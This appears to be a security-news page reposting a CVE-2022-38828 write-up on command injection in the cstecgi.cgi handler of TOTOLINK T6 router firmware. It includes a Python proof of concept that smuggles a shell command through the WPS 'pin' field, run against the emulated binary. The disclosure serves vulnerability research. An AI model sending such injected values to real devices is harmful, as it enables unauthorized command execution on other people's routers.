Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-38828: CVE/setWiFiWpsStart_1.md at main · whiter6666/CVE

TOTOLINK T6 V4.1.5cu.709_B20210518 is vulnerable to command injection via cstecgi.cgi

CVE
#mac#js#wifi

Permalink

Command Injection****TOTOLINK_T6

version: V4.1.5cu.709_B20210518

Description:

There is a execute arbitrary command in cstecgi.cgi

Source:

you may download it from : http://www.totolink.cn/home/menu/detail.html?menu_listtpl=download&id=16&ids=36

Analyse:

in sub_421AA0, pin get from mac ,and then v7->v16->v11->v15->v13

finally execute system

POC

from pwn import *
import json

data = {
    "topicurl": "setting/setWiFiWpsStart",
    "wscMode": "1",
    "pin": " ;ls > /tmp/1;:  "
}

data = json.dumps(data)
print(data)

argv = [
    "qemu-mipsel-static",
    "-g", "1234",
    "-L", "./root/",
    "-E", "CONTENT_LENGTH={}".format(len(data)),
    "-E", "REMOTE_ADDR=192.168.0.1",
    "./cstecgi.cgi"
]

a = process(argv=argv)
a.sendline(data.encode())

a.interactive()

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907